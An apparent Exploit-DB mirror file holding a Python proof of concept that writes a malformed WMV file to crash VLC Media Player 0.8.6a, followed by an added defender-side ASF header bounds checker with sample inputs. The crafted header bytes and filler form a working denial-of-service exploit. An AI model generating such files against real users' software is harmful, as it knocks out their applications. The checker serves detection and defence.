exploit-db-mirror/exploits/windows/dos/29443.py
Offensive Security 880bbe402e DB: 2019-03-08

# source: https://www.securityfocus.com/bid/22003/info
# VLC Media Player is prone to a denial-of-service vulnerability because it fails to sufficiently handle user-supplied data.
# Exploiting this issue can allow an attacker to crash the application, effectively denying service to the user.
# VLC Media Player 0.8.6a is vulnerable; other versions may also be affected.
print("-----------------------------------------------------------------------")
print("# VLC media player 0.8.6a Denial of Service")
print("# url: http://www.videolan.org/")
print("# author: shinnai")
print("# mail: shinnai[at]autistici[dot]org")
print("# site: http://shinnai.altervista.org")
print("# soundtrack: Lithium (Nirvana)")
print("# Tested on Windows xp Professional SP2 all patched")
print("# Special thanks to rgod")
print("-----------------------------------------------------------------------")
head = \
"\x30\x26\xb2\x75\x8e\x66\xcf\x11\xa6\xd9\x00\xaa\x00\x62\xce\x6c"+\
"\x66\x14\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x01\x02\xa1\xdc"+\
"\xab\x8c\x47\xa9\xcf\x11\x8e\xe4\x00\xc0\x0c\x20\x53\x65\x68\x00"+\
"\x00\x00\x00\x00\x00\x00\x88\xb6\x08\x46\x9a\x96\x6e\x45\x8d\xaf"+\
"\x90\x2c\xd0\xfc\xb6\x18\x52\x01\x1f\x00\x00\x00\x00\x00\x00\x5d"+\
"\x55\x03\x2e\xce\xc4\x01\x37\x05\x00\x00\x00\x00\x00\x00\xd0\x03"+\
"\xa1\x08\x00\x00\x00\x00\xf0\x64\x0c\x08\x00\x00\x00\x00\xb8\x0b"+\
"\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\xee\x05\x00\x00\xee\x05"+\
"\x00\x00\x5e\x6a\x15\x00\xb5\x03\xbf\x5f\x2e\xa9\xcf\x11\x8e\xe3"+\
"\x00\xc0\x0c\x20\x53\x65\x45\x10\x00\x00\x00\x00\x00\x00\x11\xd2"+\
"\xd3\xab\xba\xa9\xcf\x11\x8e\xe6\x00\xc0\x0c\x20\x53\x65\x06\x00"+\
"\x17\x10\x00\x00\xa9\x46\x43\x7c\xe0\xef\xfc\x4b\xb2\x29\x39\x3e"+\
"\xde\x41\x5c\x85\x21\x00\x00\x00\x00\x00\x00\x00\x01\x00\x06\x66"+\
"\x00\x72\x00\x00\x00\x5d\x8b\xf1\x26\x84\x45\xec\x47\x9f\x5f\x0e"+\
"\x65\x1f\x04\x52\xc9\x1a\x00\x00\x00\x00\x00\x00\x00\x02\x01\xea"+\
"\xcb\xf8\xc5\xaf\x5b\x77\x48\x84\x67\xaa\x8c\x44\xfa\x4c\xca\x5a"+\
"\x01\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x01\x00\x0c\x00\x02"+\
"\x00\x02\x00\x00\x00\x49\x00\x73\x00\x56\x00\x42\x00\x52\x00\x00"+\
"\x00\x00\x00\x00\x00\x01\x00\x34\x00\x00\x00\x06\x00\x00\x00\x44"+\
"\x00\x65\x00\x76\x00\x69\x00\x63\x00\x65\x00\x43\x00\x6f\x00\x6e"+\
"\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x6e\x00\x63\x00\x65"+\
"\x00\x54\x00\x65\x00\x6d\x00\x70\x00\x6c\x00\x61\x00\x74\x00\x65"+\
"\x00\x00\x00\x4c\x00\x31\x00\x00\x00\x00\x00\x02\x00\x0c\x00\x02"+\
"\x00\x02\x00\x00\x00\x49\x00\x73\x00\x56\x00\x42\x00\x52\x00\x00"+\
"\x00\x01\x00\x00\x00\x02\x00\x34\x00\x00\x00\x04\x00\x00\x00\x44"+\
"\x00\x65\x00\x76\x00\x69\x00\x63\x00\x65\x00\x43\x00\x6f\x00\x6e"+\
"\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x6e\x00\x63\x00\x65"+\
"\x00\x54\x00\x65\x00\x6d\x00\x70\x00\x6c\x00\x61\x00\x74\x00\x65"+\
"\x00\x00\x00\x40\x00\x00\x00\x00\x00\x01\x00\x2e\x00\x03\x00\x04"+\
"\x00\x00\x00"
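# 4000 filler bytes appended after the ASF header
buff = "A" * 4000
VLCFile = head + buff
# Python 3: convert the str to the same raw bytes (every code point is < 0x100)
if not isinstance(VLCFile, bytes):
    VLCFile = VLCFile.encode('latin-1')
# write the test file in binary mode
with open('videolan.wmv', 'wb') as fileOut:
    fileOut.write(VLCFile)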
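
Added example, not part of the original exploit file: a defender-side structural check for ASF/WMV headers that flags files like the one generated above, whose header object declares 0x1466 bytes and 7 sub-objects but is followed by filler instead of real objects. The page does not state the root cause in VLC, so this is a general container-bounds check; `check_asf_header`, `GOOD` and `BAD` are hypothetical names and the sample inputs are constructed.

```python
import struct

# ASF Header Object GUID in on-disk byte order (first 16 bytes of `head` above).
ASF_HEADER_GUID = bytes.fromhex("3026b2758e66cf11a6d900aa0062ce6c")
OBJ_HDR = 24  # every ASF object starts with a 16-byte GUID and a 64-bit LE size


def check_asf_header(data):
    """Return a list of structural problems found in an ASF/WMV header."""
    problems = []
    if len(data) < 30 or data[:16] != ASF_HEADER_GUID:
        return ["not an ASF file or truncated before the header object"]
    hdr_size, count = struct.unpack_from("<QI", data, 16)
    if hdr_size < 30 or hdr_size > len(data):
        problems.append("header object declares %d bytes, file has %d"
                        % (hdr_size, len(data)))
    end = min(hdr_size, len(data))
    pos = 30  # GUID + size + object count + two reserved bytes
    for i in range(count):
        if pos + OBJ_HDR > end:
            problems.append("object %d: header runs past the data" % i)
            break
        size = struct.unpack_from("<Q", data, pos + 16)[0]
        if size < OBJ_HDR or pos + size > end:
            problems.append("object %d at offset %d: size %d out of bounds"
                            % (i, pos, size))
            break
        pos += size
    return problems


def _obj(guid, payload):
    """Build one ASF object: GUID, total size (header included), payload."""
    return guid + struct.pack("<Q", OBJ_HDR + len(payload)) + payload


# Constructed samples: one consistent header, and one whose declared header
# size and object count are not backed by real objects (filler bytes instead).
_body = _obj(b"\x11" * 16, b"\x00" * 8)
GOOD = ASF_HEADER_GUID + struct.pack("<QIBB", 30 + len(_body), 1, 1, 2) + _body
BAD = ASF_HEADER_GUID + struct.pack("<QIBB", 5222, 2, 1, 2) + _body + b"A" * 64

if __name__ == "__main__":
    for name, sample in (("GOOD", GOOD), ("BAD", BAD)):
        print(name, check_asf_header(sample) or "ok")
```

A mail or upload gateway can run a check of this kind before a media file reaches a player and quarantine anything that returns a non-empty list.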